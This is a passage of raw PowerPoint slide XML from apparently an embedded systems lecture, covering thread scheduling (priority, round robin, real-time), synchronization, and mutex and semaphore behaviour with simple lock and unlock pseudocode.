          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Usually preemptive, can be implemented non-preemptive as well</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Low priority threads can be starved</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr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1761039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defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Embedded System Components</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="294915" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Every computer system (Embedded Systems included) is comprised of 3 main hardware components:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0" smtClean="0"/>
              <a:t>Processor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> – loads and executes code written by the programmer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0" smtClean="0"/>
              <a:t>Memories</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> – store the code and the data for the program</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0" smtClean="0"/>
              <a:t>Peripheral devices </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>– any other hardware component, typically input and output devices</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3447854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4915">
                                            <p:txEl>
                                              <p:pRg st="1" end="1"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="7" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2949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4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4915">
                                            <p:txEl>
                                              <p:pRg st="2" end="2"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="13" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2949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4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4915">
                                            <p:txEl>
                                              <p:pRg st="3" end="3"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="19" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2949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49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Round Robin</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Each thread runs for a predetermined amount of time, called </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0" smtClean="0"/>
              <a:t>quota</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0" smtClean="0"/>
              <a:t>time slice</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Then the OS preempts the thread and schedules the next ready thread</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>No starvation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Selection of time slice can largely impact the system behavior</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>A shorter time slice implies more scheduling overhead and longer response times</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Sometimes combined with priority scheduling, where threads of the same priority are scheduled round robin</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="134470717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Real-time schedulers</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Reminder: “Real-time” system - tasks must complete at a certain time</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The scheduling algorithm attempts to accommodate this requirement</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Earliest deadline first</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Resource reservation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="369141285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Synchronization</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>When tasks need to collaborate to perform a bigger task, they may need to perform some synchronization</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Mutual exclusion of resources</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Signal events</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Passing information</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="253174489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Mutex</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>A </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0" err="1" smtClean="0"/>
              <a:t>mutex</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>is used to create </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0" smtClean="0"/>
              <a:t>mutual exclusion</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> on a shared resource</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Also called “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0" smtClean="0"/>
              <a:t>lock</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Only one task can </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0" smtClean="0"/>
              <a:t>take</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0" smtClean="0"/>
              <a:t>(lock) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>mutex</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> at a given time</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Only that task is allowed to access the resource</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>When a task attempts to take a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>mutex</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> that is already taken, the OS blocks it until the owner task </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0" smtClean="0"/>
              <a:t>puts (releases) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>mutex</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> back (returns it to the OS)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Only the task that succeeds to take the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>mutex</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> is allowed to access the shared resource</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="228607047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a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>mutex</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> in the OS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mutex</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> object contains a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0" smtClean="0"/>
              <a:t>state</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> bit</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0" smtClean="0"/>
              <a:t>Lock(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0" err="1" smtClean="0"/>
              <a:t>mutex</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0"/>
              <a:t>if (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1" smtClean="0"/>
              <a:t>mutex.state</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0"/>
              <a:t> == 1) move the task to a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0" smtClean="0"/>
              <a:t>suspended</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0"/>
              <a:t> state &amp; reschedule</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0"/>
              <a:t>else, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1" smtClean="0"/>
              <a:t>mutex.state</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0"/>
              <a:t> = 1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0" smtClean="0"/>
              <a:t>Unlock(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0" err="1" smtClean="0"/>
              <a:t>mutex</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0"/>
              <a:t>if (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1" smtClean="0"/>
              <a:t>mutex.state</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0"/>
              <a:t> == 1)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0"/>
              <a:t>Check if another task is suspended on the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1" smtClean="0"/>
              <a:t>mutex</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0"/>
              <a:t>. If yes, move that task to a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0" smtClean="0"/>
              <a:t>ready</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0"/>
              <a:t> state and reschedule</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0"/>
              <a:t>if not, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1" smtClean="0"/>
              <a:t>mutex.state</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0"/>
              <a:t> = 0</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" i="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" i="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="396649329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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>mutex</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> in the OS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Requires some of the above instructions to be performed </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0" smtClean="0"/>
              <a:t>atomically</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Else, the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>mutex</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> state may be come </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0" smtClean="0"/>
              <a:t>inconsistent</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0" smtClean="0"/>
              <a:t>Race condition</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Atomicity can be achieved by:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Disabling interrupts</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Special atomic processor operations (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>test_and_set</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, XCHG, XADD)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1947726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Semaphore</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A </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0" smtClean="0"/>
              <a:t>semaphore</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> is a counter that has an initial value ‘n’</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>When a task </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0" smtClean="0"/>
              <a:t>takes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> a semaphore, it’s value is decremented by 1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>If the semaphore’s value is 0, the task is blocked until it is incremented to a nonzero value</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>When a task </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0" smtClean="0"/>
              <a:t>puts </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>a semaphore, it’s value is incremented by 1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr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214395759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Mutex</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> vs. Semaphore</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>A </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>mutex</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> is similar to a semaphore with n=1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Differences between a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>mutex</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> and a binary semaphore are OS specific</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>For example: a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>mutex</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> can be associated with a task</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>That task is allowed to lock the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>mutex</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> multiple times</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Only that task can release the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>mutex</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>In theory, a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>mutex</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> is designed for mutual exclusion, a semaphore is designed for signaling</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="32415025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a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
